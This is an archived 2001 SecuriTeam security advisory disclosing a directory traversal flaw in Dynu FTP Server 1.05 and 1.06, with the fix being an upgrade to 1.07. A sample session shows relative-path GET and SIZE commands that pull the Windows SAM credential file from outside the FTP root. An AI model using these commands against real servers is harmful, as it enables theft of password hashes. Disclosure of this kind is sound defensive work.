[NT] DynuFtpServer Security Vulnerabilities

From: support@securiteam.com
Date: 09/02/01 

From: support@securiteam.com
To: list@securiteam.com
Subject: [NT] DynuFtpServer Security Vulnerabilities
Message-Id: <20010902204248.A0960138C0@mail.der-keiler.de>
Date: Sun,  2 Sep 2001 22:42:48 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  DynuFtpServer Security Vulnerabilities
------------------------------------------------------------------------

SUMMARY

 <http://www.dynu.com/dynuftpserver.asp> Dynu FTP Server is a
multithreaded FTP server supporting RFC 959 protocol. The FTP server's
features include support for multi-homed servers, user access management,
active log and much more. A security vulnerability in the product allows
downloading files that reside outside the bounding FTP root directory.

DETAILS

Vulnerable systems:
DynuFtpServer version 1.06
DynuFtpServer version 1.05

Immune systems:
DynuFtpServer version 1.07

The security problem occurs when using relative paths in connection with
the GET command (retrieve files) or the SIZE command.

Sample session:
331 Anonymous access allowed, send identity (e-mail name) as password.
Kennwort:
230 Anonymous user logged in.
ftp> quote size /../winnt/repair/sam
213 20480
ftp> get /../winnt/repair/sam c:\sec\sam
200 PORT command successful.
150 Opening ASCII mode data connection for /../winnt/repair/sam.
226 Transfer complete.

Solution:
Upgrade to the latest version 1.07

ADDITIONAL INFORMATION

The information has been provided by
<mailto:Christoph.Heindl@fhs-hagenberg.ac.at> Christoph.Heindl.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [NT] Windows FTP Client Allows File Transfer Location Tampering (MS05-044)
    ... Get your security news from a reliable source. ... A tampering vulnerability exists in the Windows FTP client. ... * Microsoft Windows Server 2003 for Itanium-based Systems - ...
    (Securiteam)
  • [NEWS] Symantec Enterprise Firewall FTP Bounce Vulnerability (Patch Available)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Raptor Firewall FTP Bounce Vulnerability. ... PORT command referenced a destination that doesn't ...
    (Securiteam)
  • [UNIX] SafeTP Reveals Internal Server IP Addresses
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Protocol) to connect to their accounts on UNIX or NT/2000 FTP servers. ... check out the "227 Entering Passive Mode ... Timed out waiting for connection from server. ...
    (Securiteam)
  • RE:[fw-wiz] Vulnerability Scanners ( was: concerning ~el8 / project mayhem )
    ... >>access control should be in place that prevents FTP traffic ... >>w.x.y.z is running an FTP server and you can access it. ... One major provider with a foot in the security realm has had ... Of course doing that documentation would impact ...
    (Firewall-Wizards)
  • RE: FTP server security.
    ... If you apply proper access controls to the folder structure, ... Security Business Unit ... Subject: FTP server security. ... most highly-anticipated industry event of the year. ...
    (Focus-Microsoft)